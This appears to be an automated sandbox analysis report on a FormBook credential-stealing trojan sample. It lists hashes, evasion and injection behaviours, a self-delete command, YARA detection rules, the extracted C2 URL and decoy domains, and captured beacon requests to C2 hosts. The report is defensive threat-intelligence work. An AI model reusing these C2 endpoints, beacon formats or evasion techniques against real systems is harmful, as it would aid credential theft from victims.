Windows Analysis Report
S22Ls0H4Sz.exe

Overview

General Information

Sample Name: S22Ls0H4Sz.exe
Original Sample Name: 24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4.exe
Analysis ID: 830328
MD5: 883a36165d45cffa69e01d06532d3958
SHA1: 4034cc0bc72a474fca5204528c658e6f79e0de4b
SHA256: 24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • S22Ls0H4Sz.exe (PID: 5492 cmdline: C:\Users\user\Desktop\S22Ls0H4Sz.exe MD5: 883A36165D45CFFA69E01D06532D3958)
    • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • help.exe (PID: 1068 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 5212 cmdline: /c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.573415.com/dr62/"], "decoy": ["juanbrujo.com", "toptasker.africa", "g-labs.one", "1redbuckpermonth.com", "lasolutions.online", "beginagainmen.com", "iearn.site", "leading-car.ru", "codigosindiabetes.fun", "6y8ud.bond", "fptmarket.shop", "ctjhxv3.vip", "huluxia2.xyz", "piggg08.uk", "kms-pico-tools.com", "westonandcate.com", "giftrendz.com", "kqwdhrendfywefdst.top", "anchitchoudhary.com", "sistemodasi.net", "dotcomsolutions.co.uk", "anastaciachetty.com", "czh.ink", "complete-energy-performance.com", "kollanjurarna.se", "anotherdaythelabel.com", "fengkoo.com", "sunsongproductions20.com", "horhog.com", "chq-1.com", "cryptogame.rsvp", "jjzb10a.xyz", "raffletokens.com", "djmikehall.com", "baychocolates.online", "ecoskiusa.com", "myenergyusage.co.uk", "lipcarehub.africa", "isstrainingaz.com", "engagementbuzz.com", "jordanheritagita.online", "cheaphockeysticks.com", "rodeosonline.uk", "access247connect.info", "85putao.com", "josefa.wien", "pilcoh.online", "apothakeehair.com", "danadelseck.com", "dslimme.com", "alacatimacunu.com", "caplesssociety.com", "creativeirishgfts.com", "blografie.com", "hamfoods.com", "ballonstunisie.com", "jingduxueyue.site", "goldoholic.com", "millennialcore.net", "tacairservice.com", "betheme.shop", "bathroadtraders.co.uk", "jas757.com", "crossovers-82617.com"]}
Source | Rule | Description | Author | Strings
S22Ls0H4Sz.exe | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    S22Ls0H4Sz.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      S22Ls0H4Sz.exe | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x5651:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1bfb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x9dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x14ca7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      S22Ls0H4Sz.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8d08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14aa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14591:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14ba7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14d1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x998a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1380c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa683:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ad17:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bd1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      S22Ls0H4Sz.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x17c39:$sqlite3step: 68 34 1C 7B E1
      • 0x17d4c:$sqlite3step: 68 34 1C 7B E1
      • 0x17c68:$sqlite3text: 68 38 2A 90 C5
      • 0x17d8d:$sqlite3text: 68 38 2A 90 C5
      • 0x17c7b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17da3:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_772cc62d | unknown | unknown
      • 0xa42:$a2: pass
      • 0xa48:$a3: email
      • 0xa4f:$a4: login
      • 0xa56:$a5: signin
      • 0xa67:$a6: persistent
      • 0xc3a:$r1: C:\Users\user\AppData\Roaming\8LMNT35B\8LMlog.ini
      00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x6051:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1c9b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa7bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x156a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9708:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x154a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14f91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x155a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1571f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa38a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1420c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb083:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b717:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c71a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Source | Rule | Description | Author | Strings
          0.2.S22Ls0H4Sz.exe.380000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
            0.2.S22Ls0H4Sz.exe.380000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
              0.2.S22Ls0H4Sz.exe.380000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
              • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              0.2.S22Ls0H4Sz.exe.380000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
              • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              0.2.S22Ls0H4Sz.exe.380000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
              • 0x17a39:$sqlite3step: 68 34 1C 7B E1
              • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
              • 0x17a68:$sqlite3text: 68 38 2A 90 C5
              • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
              • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
              No Sigma rule has matched
              No Snort rule has matched

              AV Detection

              Source: S22Ls0H4Sz.exe, ReversingLabs: Detection: 79%
              Source: S22Ls0H4Sz.exe, Virustotal: Detection: 62%
              Source: Yara match, File source: S22Ls0H4Sz.exe, type: SAMPLE
              Source: Yara match, File source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: S22Ls0H4Sz.exe, Avira: detected
              Source: http://www.bathroadtraders.co.uk/dr62/www.alacatimacunu.com, Avira URL Cloud: Label: malware
              Source: http://www.85putao.com/dr62/, Avira URL Cloud: Label: malware
              Source: http://www.85putao.com/dr62/www.engagementbuzz.com, Avira URL Cloud: Label: malware
              Source: http://www.myenergyusage.co.uk/dr62/www.jingduxueyue.site, Avira URL Cloud: Label: malware
              Source: http://www.bathroadtraders.co.uk/dr62/, Avira URL Cloud: Label: malware
              Source: http://www.pilcoh.online/dr62/www.573415.com, Avira URL Cloud: Label: malware
              Source: http://www.pilcoh.online, Avira URL Cloud: Label: malware
              Source: http://www.myenergyusage.co.uk/dr62/, Avira URL Cloud: Label: malware
              Source: http://www.pilcoh.online/dr62/, Avira URL Cloud: Label: malware
              Source: S22Ls0H4Sz.exe, Joe Sandbox ML: detected
              Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
              Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
              Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook
              Source: S22Ls0H4Sz.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: S22Ls0H4Sz.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.246037562.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000002.284939742.0000000000CFF000.00000040.00001000.00020000.00000000.sdmp, S22Ls0H4Sz.exe, 00000000.00000003.243678010.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.281704027.000000000346B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000002.00000003.285219757.0000000003605000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: help.pdbGCTL source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: help.pdb source: S22Ls0H4Sz.exe, 00000000.00000003.281707560.00000000007BC000.00000004.00000020.00020000.00000000.sdmp

              Networking

              Source: C:\Windows\explorer.exe, Domain query: www.lipcarehub.africa
              Source: C:\Windows\explorer.exe, Network Connect: 199.59.243.223 80
              Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
              Source: C:\Windows\explorer.exe, Domain query: www.ecoskiusa.com
              Source: Malware configuration extractor, URLs: www.573415.com/dr62/
              Source: Joe Sandbox View, ASN Name: BODIS-NJUS BODIS-NJUS
              Source: global traffic, HTTP traffic detected: GET /dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv HTTP/1.1
                Host: www.rodeosonline.uk
                Connection: close
                Data Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global traffic, HTTP traffic detected: GET /dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv HTTP/1.1
                Host: www.ecoskiusa.com
                Connection: close
                Data Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox View, IP Address: 199.59.243.223 199.59.243.223
              Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden
                Server: openresty
                Date: Mon, 20 Mar 2023 08:13:12 GMT
                Content-Type: text/html
                Content-Length: 291
                ETag: "6418120d-123"
                Via: 1.1 google
                Connection: close
                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
              Source: explorer.exe, 00000001.00000002.523897898.0000000013CBF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000002.00000002.512081375.00000000041BF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: unknownDNS traffic detected: queries for: www.rodeosonline.uk
              Source: C:\Windows\explorer.exeCode function: 1_2_047A8F82 getaddrinfo,setsockopt,recv,1_2_047A8F82
              Source: global trafficHTTP traffic detected: GET /dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv HTTP/1.1Host: www.rodeosonline.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv HTTP/1.1Host: www.ecoskiusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: S22Ls0H4Sz.exe, 00000000.00000002.284494353.00000000007A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud

              Source: Yara matchFile source: S22Ls0H4Sz.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: S22Ls0H4Sz.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: S22Ls0H4Sz.exe, type: SAMPLEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: S22Ls0H4Sz.exe, type: SAMPLEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
              Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: S22Ls0H4Sz.exe PID: 5492, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: explorer.exe PID: 3320, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: help.exe PID: 1068, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: S22Ls0H4Sz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: S22Ls0H4Sz.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: S22Ls0H4Sz.exe, type: SAMPLEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: S22Ls0H4Sz.exe, type: SAMPLEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
